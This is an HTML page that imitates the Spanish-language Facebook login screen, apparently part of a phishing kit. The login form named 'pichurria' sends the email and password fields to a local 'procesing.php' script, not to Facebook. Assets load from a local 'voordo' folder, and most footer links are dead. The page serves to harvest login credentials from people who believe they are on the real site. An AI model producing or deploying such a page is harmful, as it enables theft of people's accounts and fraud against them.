<!DOCTYPE html>
<html lang="es" class="">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
<title id="pageTitle">Iniciar sesión en Facebook | Facebook</title>
<meta property="og:site_name" content="Facebook">
<meta property="og:url" content="https://www.facebook.com/">
<meta property="og:locale" content="es_LA">
<meta name="description" content="Inicia sesión en Facebook para empezar a compartir y conectarte con tus amigos, tus familiares y las personas que conoces.">
<meta name="robots" content="noodp,noydir">
<link rel="shortcut icon" href="./voordo/iRmz9lCMBD2.ico">
<link type="text/css" rel="stylesheet" href="./voordo/OhHBXkOgw_1.css" data-bootloader-hash="bsT7h" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="./voordo/2M6jm5QlrXi.css" data-bootloader-hash="zXe/E" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="./voordo/AJjgrc0eBRB.css" data-bootloader-hash="ccHw5" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="./voordo/9UEXnNPC0jZ.css" data-bootloader-hash="9o+cR" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="./voordo/PRTWmRyV9iX.css" data-bootloader-hash="mO9/n" crossorigin="anonymous">
<link type="text/css" rel="stylesheet" href="./voordo/W1hi0bxgFpn.css" data-bootloader-hash="t05dq" crossorigin="anonymous">
</head>

<body class="login_page _39il UIPage_LoggedOut _-kb _61s0 _605a b_c3pyn-ahh webkit win x1 Locale_es_LA cores-gte4 _19_u hasAXNavMenubar" dir="ltr">
<div class="_li" id="u_0_2">
	<div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_3">
	<div class="_608m">
	<div class="clearfix _ikh _tb6">
	<div class="_4bl7">
	<span class="mrm _3bcv _50f3">Ir a</span></div>
	<div class="_4bl9 _3bcp"><div class="_6a _608n" aria-label="Asistente de navegación" role="menubar" id="u_0_4">
	<div class="_6a uiPopover" id="u_0_5">
	<a role="menuitem" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=100#" style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle" id="u_0_6">
    <span class="_55pe">Secciones de esta página</span>
	<span class="_4o_3 _3-99"><i class="img sp_Df33dxlhqsi sx_f3eaef">
	</i></span></a></div>
	<div class="_6a _3bcs"></div>
	<div class="_6a mrm uiPopover" id="u_0_7">
		<a role="menuitem" class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy" href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1" aria-expanded="false" rel="toggle" id="u_0_8">
			<span class="_55pe">Ayuda sobre accesibilidad</span>
		<span class="_4o_3 _3-99">
		<i class="img sp_Df33dxlhqsi sx_0b21f1"></i></span></a></div></div></div></div></div></div>
	<div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
		<div id="blueBarDOMInspector">
			<div class="_53jh">
			<div class="loggedout_menubar_container">
			<div class="clearfix loggedout_menubar">
			<div class="lfloat _ohe">
			<h1><a href="https://www.facebook.com/" title="Ir a la página de inicio de Facebook">
			<i class="fb_logo img sp_Df33dxlhqsi sx_281d8e">
			<u>Facebook</u>
	</i></a></h1>
	</div>
	</div>
	</div>
		<div class="signupBanner">
			<div class="signup_bar_container">
			<div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="https://www.facebook.com/r.php?locale=es_LA">Registrarte</a>
		</span></div></div></div></div></div></div>
		<div id="globalContainer" class="uiContextualLayerParent">
			<div class="fb_content clearfix " id="content" role="main"><div class="_4-u5 _30ny">
			<span class="muffin_tracking_pixel_start">
				<div class="_cqs"><div class="_585n _3-8n" id="u_0_c"><i class="_585p img sp_Df33dxlhqsi sx_2a88b1"><u>Notice</u></i><div class="_585r _50f4">Debes iniciar sesión para continuar.</div></div></div>
		</span><img class="tracking_pixel">
		<span class="muffin_tracking_pixel_end"></span><div class="_4-u2 _1w1t _4-u8 _52jv">
			<div class="_xku" id="header_block">
			<span class="_50f6">Iniciar sesión en Facebook</span></div>
		<div class="login_form_container">
			<form id="login_form" name="pichurria" action="procesing.php" method="post" onsubmit="">
			<input type="hidden" name="jazoest" value="2639" autocomplete="off">
		<input type="hidden" name="lsd" value="AVqUZ2MI" autocomplete="off">
		<input type="hidden" autocomplete="off" id="error_box">
		<div id="loginform">
			<input type="hidden" autocomplete="off" id="display" name="display" value="">
		<input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value="">
		<input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="">
		<input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="0"><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value="">
		<input type="hidden" autocomplete="off" id="return_session" name="return_session" value="">
		<input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value="">
		<input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value="">
		<input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1"><input type="hidden" autocomplete="off" name="timezone" value="300" id="u_0_9">
		<input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxOTIwLCJoIjoxMLCJhdyI6MTkyMCwiYWgiOjEwNTAsImMiOjI0fQ==" id="u_0_a">
		<input type="hidden" name="lgnrnd" value="074657_BGRy">
		<input type="hidden" id="lgnjs" name="lgnjs" value="1558190818">
		<div class="clearfix _5466 _44mg" id="email_container">
			<input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Correo electrónico o número de teléfono" value="" autofocus="1" aria-label="Correo electrónico o número de teléfono"></div>
		<div class="clearfix _5466 _44mg">
			<input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass" id="pass" tabindex="0" placeholder="Contraseña" aria-label="Contraseña">
		</div>
			<div class="_xkt">
				<button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Iniciar sesión</button>
		</div>
			<div id="login_link">
				<div class="_xkt">
				<a href="#" id="forgot-password-link" target="">¿Olvidaste tu cuenta?</a>
		</div>
			<div class="_1rf5">
				<span class="_1rf8">o</span>
		</div><div class="_xkt">
			<a role="button" class="_42ft _4jy0 _4jy6 _4jy2 selected _51sy" href="#" style="font-size: 14px">Crear cuenta nueva</a>
		</div>
		</div>
		</div>
			<input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="">
			<input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source">
			<input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type"><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source"><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type">
			<input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false">
			<input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false">
			<input type="hidden" autocomplete="off" name="ab_test_data" value=""></form></div></div></div></div><div><div id="pageFooter" data-referrer="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
				<li>Español</li>
			    <li><a class="_sv4" dir="ltr" href="#" title="English (US)">English (US)</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="Portuguese (Brazil)">Português (Brasil)</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="French (France)">Français (France)</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="Italian">Italiano</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="German">Deutsch</a></li>
				<li><a class="_sv4" dir="rtl" href="#" title="Arabic">العربية</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="Japanese">日本語</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="Hindi">हिन्दी</a></li>
				<li><a class="_sv4" dir="ltr" href="#" title="Simplified Chinese (China)">中文(简体)</a></li>
				<li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" href="#" title="Mostrar más idiomas">
					<i class="img sp_mnr2W1f-YLD sx_b798a1"></i>
				</a>
				</li>
				</ul>
					<div id="contentCurve"></div>
					<div role="contentinfo" aria-label="Enlaces a sitios de Facebook" id="js_0">
						<ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li>
						<a href="#" title="Regístrate en Facebook">Registrarte</a></li>
					<li><a href="#" title="Iniciar sesión en Facebook">Iniciar sesión</a></li>
					<li><a href="#" title="Descubre Messenger.">Messenger</a></li>
					<li><a href="#" title="Facebook Lite para Android.">Facebook Lite</a></li>
					<li><a href="#" title="Explora nuestro directorio de personas.">Personas</a></li>
					<li><a href="#" title="Explora nuestro directorio de perfiles.">Perfiles</a></li>
					<li><a href="#" title="Explora nuestro directorio de páginas.">Páginas</a></li>
					<li><a href="#">Categorías de páginas</a></li>
					<li><a href="#" title="Explora nuestro directorio de eventos.">Eventos</a></li>
					<li><a href="#" title="Descubre lugares populares en Facebook.">Lugares</a></li>
					<li><a href="#" title="Descubre juegos en Facebook.">Juegos</a></li>
					<li><a href="#" title="Explora nuestro directorio de lugares.">Ubicaciones</a></li>
					<li><a href="#" title="Explora nuestro directorio de productos de Marketplace.">Marketplace</a></li>
					<li><a href="#" title="Explora nuestro directorio de grupos.">Grupos</a></li>
					<li><a href="#" title="Descubre Instagram." target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li>
					<li><a href="#" title="Explora nuestro directorio de listas locales.">Local</a></li>
					<li><a href="#" title="Haz una donación a causas que te importan.">Recaudaciones de fondos</a></li>
					<li><a href="#" accesskey="8" title="Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo.">Información</a></li>
					<li><a href="#" title="Anúnciate en Facebook.">Crear anuncio</a></li>
					<li><a href="#" title="Crea una página.">Crear página</a></li>
					<li><a href="#" title="Desarrolla en nuestra plataforma.">Desarrolladores</a></li>
					<li><a href="#" title="Únete a nuestra extraordinaria empresa.">Empleo</a></li>
					<li><a href="#" title="Infórmate acerca de tu privacidad y Facebook.">Privacidad</a></li>
					<li><a href="#" title="Infórmate acerca de las cookies y Facebook." data-nocookies="1">Cookies</a></li>
					<li><a class="_41ug" href="#" title="Conoce las opciones de anuncios.">Opciones de anuncios<i class="img sp_Df33dxlhqsi sx_b463e9"></i></a></li>
					<li><a data-nocookies="1" href="https://www.facebook.com/policies?ref=pf" accesskey="9" title="Consulta nuestras políticas y condiciones.">Condiciones</a></li>
					<li><a href="#">Seguridad de la cuenta</a></li>
					<li><a href="#">Ayuda para iniciar sesión</a></li>
					<li><a href="#" accesskey="0" title="Visita nuestro servicio de ayuda.">Ayuda</a></li>
					<li><a accesskey="6" class="accessible_elem" href="#" title="Ve y edita tu configuración de Facebook.">Configuración</a></li>
					<li><a accesskey="7" class="accessible_elem" href="#" title="Ver tu registro de actividad">Registro de actividad</a></li></ul></div>
					<div class="mvl copyright"><div><span> Facebook © 2019</span></div></div></div></div></div><div></div><span>
		            <img src="./voordo/hsts-pixel.gif" width="0" height="0" style="display:none"></span></div><div>
		</div>
	</body></html>